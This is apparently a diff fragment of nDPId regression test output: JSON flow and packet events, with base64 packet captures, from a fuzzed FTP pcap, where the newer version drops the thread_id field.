00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1120469635012,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1120469635012,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1120469635012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1120469635012,"pkt":"ADBUACRWAODtAW69CABFAAA0aa9AAIAGOYPAqAECk+oB\/Qp3ABWvncMg5R+Vb1AYQaK71QAAUEFTUyBkMHhhIQ0K"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1120469635012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1120469635012,"pkt":"ADBUACRWAODtAW69CABFAAA0aa9AAIAGOYPAqAECk+oB\/Qp3ABWvncMg5R+Vb1AYQaK71QAAUEFTUyBkMHhhIQ0K"}
00369{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":55,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1120469635042,"pkt":"ADBUADRWAODtAW69CAAGAAAoabBAAIAGOY7AqAECk+oB\/QqgABWvncMs5R+VqVAQQYAeegAA"} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":55,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1120469635042,"pkt":"ADBUADRWAODtAW69CAAGAAAoabBAAIAGOY7AqAECk+oB\/QqgABWvncMs5R+VqVAQQYAeegAA"}
00209{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":55,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120469635042} 00195{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"packet_id":55,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120469635042}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635042,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635042,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1120469635042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635042,"pkt":"AODtAW69ADBUBDRWCABFEAAreQZAADkGcSWT6gH9wAIBAgAVCqDlH5Wpr53DLFAYYzbSqwAAIA0KAAAA"} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1120469635042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635042,"pkt":"AODtAW69ADBUBDRWCABFEAAreQZAADkGcSWT6gH9wAIBAgAVCqDlH5Wpr53DLFAYYzbSqwAAIA0KAAAA"}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1120469635043,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1120469635043,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1120469635043,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1120469635043,"pkt":"AODtAW69ADBUADRWCABFEABDeQdAADkGcQyT6gH9wKgBQgAVCqDlH5Wsr53DLFAYYzYWCgAAIC9wdWIJCS0+IFB1YmxpYyBGb2xkZXIuIA0K"} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1120469635043,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1120469635043,"pkt":"AODtAW69ADBUADRWCABFEABDeQdAADkGcQyT6gH9wKgBQgAVCqDlH5Wsr53DLFAYYzYWCgAAIC9wdWIJCS0+IFB1YmxpYyBGb2xkZXIuIA0K"}
00412{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":62,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":87,"pkt_l4_len":0,"thread_ts_msec":1120469635044,"pkt":"AODtAW69ADBUADRWCABFJXMAeQpAADkGcQOT6gH9wKgBAgB4CqDlH5YGr53DLFAYY3bTEAAAIC9pbmNvbWluZwktJXMAbmNvbWluZyBGb2xkZXIuIA0K"} 00398{"packet_event_id":1,"packet_event_name":"packet","packet_id":62,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":87,"pkt_l4_len":0,"thread_ts_msec":1120469635044,"pkt":"AODtAW69ADBUADRWCABFJXMAeQpAADkGcQOT6gH9wKgBAgB4CqDlH5YGr53DLFAYY3bTEAAAIC9pbmNvbWluZwktJXMAbmNvbWluZyBGb2xkZXIuIA0K"}
00229{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":62,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":53,"global_ts_msec":1120469635044} 00215{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":62,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":53,"global_ts_msec":1120469635044}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120469635045,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120469635045,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1120469635045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1120469635045,"pkt":"AODtAW69ADBUADRWCABFEABjeQtAADkGcOiT6gGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1120469635045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1120469635045,"pkt":"AODtAW69ADBUADRWCABFEABjeQtAADkGcOiT6gGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00412{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":65,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":87,"pkt_l4_len":0,"thread_ts_msec":1120469635045,"pkt":"AODtAW69ADBUJXMACABFEBBJeQxAADkGcQGT6gH5wKgBAggVCqDlH5Zir53DLFAYYzaAtgAAIC9vdXRnb2luZwktPiBvdXRnb2luZyBGb2xkZXIuIA0K"} 00398{"packet_event_id":1,"packet_event_name":"packet","packet_id":65,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":87,"pkt_l4_len":0,"thread_ts_msec":1120469635045,"pkt":"AODtAW69ADBUJXMACABFEBBJeQxAADkGcQGT6gH5wKgBAggVCqDlH5Zir53DLFAYYzaAtgAAIC9vdXRnb2luZwktPiBvdXRnb2luZyBGb2xkZXIuIA0K"}
00229{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":65,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":53,"global_ts_msec":1120469635045} 00215{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":65,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":53,"global_ts_msec":1120469635045}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635046,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635046,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1120469635046,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635046,"pkt":"AKrtAW69ADBUADRWCABFEAAreQ5AADkGcR2T6gH9wKgBAgAVCKDlH5a+r53DLFgYYzbRlgAAIFUKAAAA"} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1120469635046,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635046,"pkt":"AKrtAW69ADBUADRWCABFEAAreQ5AADkGcR2T6gH9wKgBAgAVCKDlH5a+r53DLFgYYzbRlgAAIFUKAAAA"}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7440000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120469635048,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7440000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120469635048,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -115,32 +115,32 @@
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1120469635049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635049,"pkt":"AODtAW69ADBUADRWCABFEAAreRJAADkGcRmT6gH9wKgBAgQVCqDlH5cvr53DLFAYYzbRJQAAIA0KAAAA"} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1120469635049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635049,"pkt":"AODtAW69ADBUADRWCABFEAAreRJAADkGcRmT6gH9wKgBAgQVCqDlH5cvr53DLFAYYzbRJQAAIA0KAAAA"}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120469635052,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120469635052,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1120469635052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1120469635052,"pkt":"AODtAW69ADBUADRWCABFEABReRRAADkGcPGT6gH9wKhBAgAVCqDlH5dFr53DLFAYYzYwqgAAMjMwIEd1ZXN0IGFjY2VzcyBncmFudGVkIGZvciBhbm9ueW1vdSVzAAo="} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1120469635052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1120469635052,"pkt":"AODtAW69ADBUADRWCABFEABReRRAADkGcPGT6gH9wKhBAgAVCqDlH5dFr53DLFAYYzYwqgAAMjMwIEd1ZXN0IGFjY2VzcyBncmFudGVkIGZvciBhbm9ueW1vdSVzAAo="}
00381{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":78,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":62,"pkt_l4_len":0,"thread_ts_msec":1120469635052,"pkt":"ADBUADRWAODtAW69CADFAAAwabhAAIAGOX7AqAECk+oB\/QqgABWvncMs5R+XblAYP7tMeAAAVFlQRSBJDQo="} 00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":78,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":62,"pkt_l4_len":0,"thread_ts_msec":1120469635052,"pkt":"ADBUADRWAODtAW69CADFAAAwabhAAIAGOX7AqAECk+oB\/QqgABWvncMs5R+XblAYP7tMeAAAVFlQRSBJDQo="}
00209{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":78,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120469635053} 00195{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"packet_id":78,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120469635053}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120469635105,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120469635105,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1120469635105,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1120469635105,"pkt":"AODtAW69ADBUADRWCABFEAA7eRVAADkGcQaT6gH9VKgBAgAVCqDlH5dur53DNFAYYzYlcwAAMjAwIFR5cGUgc2V0IHRvIEkNCg=="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1120469635105,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1120469635105,"pkt":"AODtAW69ADBUADRWCABFEAA7eRVAADkGcQaT6gH9VKgBAgAVCqDlH5dur53DNFAYYzYlcwAAMjAwIFR5cGUgc2V0IHRvIEkNCg=="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7440000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1120469635106,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7440000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1120469635106,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1120469635106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1120469635106,"pkt":"ADBUADRWAODtAW69CABFAAAuablAAIAGOX\/AcAECk+oB\/QqgABWvncM05R+XgVAYP6htwgAAUEFTVg0K"} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1120469635106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1120469635106,"pkt":"ADBUADRWAODtAW69CABFAAAuablAAIAGOX\/AcAECk+oB\/QqgABWvncM05R+XgVAYP6htwgAAUEFTVg0K"}
